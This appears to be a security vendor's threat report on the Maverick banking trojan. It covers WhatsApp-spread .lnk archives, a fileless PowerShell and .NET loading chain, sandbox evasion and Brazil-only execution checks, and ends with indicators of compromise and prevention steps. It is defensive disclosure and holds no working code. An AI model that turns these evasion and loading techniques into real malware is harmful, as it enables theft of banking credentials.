A massive campaign targeting Brazilian financial institutions has been identified, with over 62000 infection attempts blocked within the first 10 days since discovery.

Attributed to the “Water Saci” threat actor, the “Maverick” banking trojan is designed to capture credentials through a combination of remote access, keylogging, and phishing overlay injection. Unlike most pieces of malware, the infection chain is extremely complicated and fully fileless. Let’s take a closer look at how it works.

How It Works

The propagation mechanism for Maverick is referred to as “SORVEPOTEL”, a fully-fileless malware loader that is both self-propagating and designed to execute entirely in memory, evading many signature-based antivirus agents.

1. .lnk (Windows shortcut) files are archived into .zip format and distributed en masse via the desktop version of WhatsApp. .lnk is reportedly used because it is not blocked by WhatsApp’s file-sharing filters.
2. When a user downloads and executes the file, it launches cmd.exe with obfuscated arguments. This application assembles and executes a Windows Powershell (.ps1) script.
3. This PowerShell script contacts a command-and-control domain to download a follow-on PowerShell script. This second script decodes a decimal array and reflectively loads a 64-bit .NET DLL assembly directly into the memory of the PowerShell process.

This in-memory .NET DLL serves as the initial loader for the Maverick framework. Let’s look closer into the actual technical payload.

• Obfuscation: The loader is protected by a commercial obfuscator known as ArmDot, and employs techniques such as Control Flow Flattening to frustrate static analysis by antimalware engines.
• C2 Validation: The process sends an API key in the X-Request-Headers field, which is locally calculated in the Base64(HMAC256(Key)) algorithm using the hardcoded “MaverickZapBot2025SecretKey12345” key. This allows the malware to avoid detection by analysis and sandbox tools, meaning that researchers attempting to download the payload from the command-and-control URL will receive no data.
• Shellcode Delivery: Upon successful validation, the command-and-control serves two shellcodes encrypted using Donut and decrypted via XOR. When this step is complete, two .NET executables are loaded, successfully preparing for the next stage.

The Maverick’s payload design is modular, with each being injected into the aforementioned separate instances of powershell_ise.exe:

• The first component utilizes WPPConnect to interface with and hijack the user’s WhatsApp web session, automatically sending the infected .zip archive to all contacts in their address book.
• The second component monitors active browser tabs for domains that match a hardcoded list of financial institutions. If a match is found, it triggers the execution of the final payload.

The final payload is named Maverick.Agent, and contains the core remote access trojan (RAT) functionality.

• To further obfuscate and evade sandboxing or analysis, the agent will only execute if it confirms it is running in a Brazilian environment. All four of the following conditions must be met:
  • IsValidBrazilianTimezone(): Checks if the time zone is between UTC-5 and UTC-2
  • IsBrazilianLocale(): Checks if the language/locale is “pt-BR”
  • IsBrazilianRegion(): Checks if the system region is “BR” or “BRA”
  • IsBrazilianDateFormat(): Checks if the short date format is “dd/MM/yyyy”
• The agent’s target list is compressed, encrypted, and stored as a base64 string. This includes 26 Brazilian bank websites, 6 cryptocurrency exchange websites, 1 payment platform, and an unknown number of Brazilian hotels
• If a target website is accessed, the agent provides the attacker with full control over the local machine, including:
  • Installing a keylogger to identify and exfiltrate credentials
  • Remote access, such as the ability to control the mouse and keyboard, take screenshots, terminate processes, reboot the machine, and more
  • Serve phishing overlay pages to capture credentials
• The agent’s command-and-control communication uses the Watson TCP client library for .NET over an SSL tunnel to the host, with the certificate “Maverick2025!” and password for agent authentication “101593a51d9c40fc8ec162d67504e221”

Ties to “Coyote”

First detected in 2024, “Coyote” is another banking trojan that is hyper-focused on the Brazil region. Associated with the “Hive0147” threat actor, it is theorized (and Casmer Labs agrees) that the Maverick trojan is an evolution of this highly successful piece of malware.

Aspect	Coyote	Maverick
Primary Delivery Mechanism	Phishing Emails (.zip with .lnk or .msi files)	WhatsAPP (.zip with .lnk)
Architecture	Monolithic .NET Trojan	Modular Design With Separate Propagation (SORVEPOTEL) and Agent (Maverick)
Loader Chain	Squirrel Installer -> NodeJS -> DLL Sideload -> Nim Loader	.LNK -> Powershell -> In-Memory .NET loader -> Donut Shellcode
Key Innovation	Using UI Automation framework for credential theft	WhatsApp Web Form (WPPConnect), Anti-Analysis C2 Validation
Attribution	Hive0147	Water Saci
Obfuscation	Nim Loader, XOR, Binary Padding	ArmDot, Control Flow Flattening, Donut

Figure 1. Comparison of tactics, techniques, and procedures (TTPs)

Indicators of Compromise

Type	Indicator
Domain	sorvetenopote[.]com
Domain	casadecampoamazonas[.]com
Domain	zapgrande[.]com
IP Address	77.111.101.169
IP Address	181.41.201.184
C2 Artifact	MaverickZapBot2025SecretKey12345 (HMAC Key)
C2 Artifact	Maverick2025! (Certificate Password)
C2 Artifact	101593a51d9c40fc8ec162d67504e221 (Agent Password)
Detection	HEUR:Trojan-Banker.MSIL.Maverick.gen
Detection	HEUR:Trojan.Multi.Powenot.a

Prevention Methods

1. Configure IDS, IPS, and web filters to block all known indicators of compromise (described above).
2. Harden endpoints by:
   • Restricting or blocking the execution of .lnk files, particularly those originating from .zip archives or downloaded by messaging clients.
   • Changing PowerShell execution policies by enabling script block logging and module logging, as well as monitoring for suspicious command-line arguments such as Net.WebClient
   • Blocking the execution of powershell_ise.exe for all non-privileged users and non-developer systems.
3. Double down on security awareness training, adding in a module or coverage for social engineering attacks delivered via non-traditional vectors such as WhatsApp. Instruct employees to never open unsolicited .zip archives or .lnk files, even if they appear to have originated from a trusted contact.

Conclusion

The Maverick trojan is a highly complicated and effective method for stealing credentials and compromising banks. Targeted exclusively within the region of Brazil, the Water Saci threat actor has managed to both limit scope and increase the efficacy of their campaigns. As widespread knowledge of this campaign continues to spread, it is likely that the Maverick trojan will decline in effectiveness, but the framework designed by Water Saci will likely be replicated, moved to other markets, or otherwise altered or improved in the coming months and years.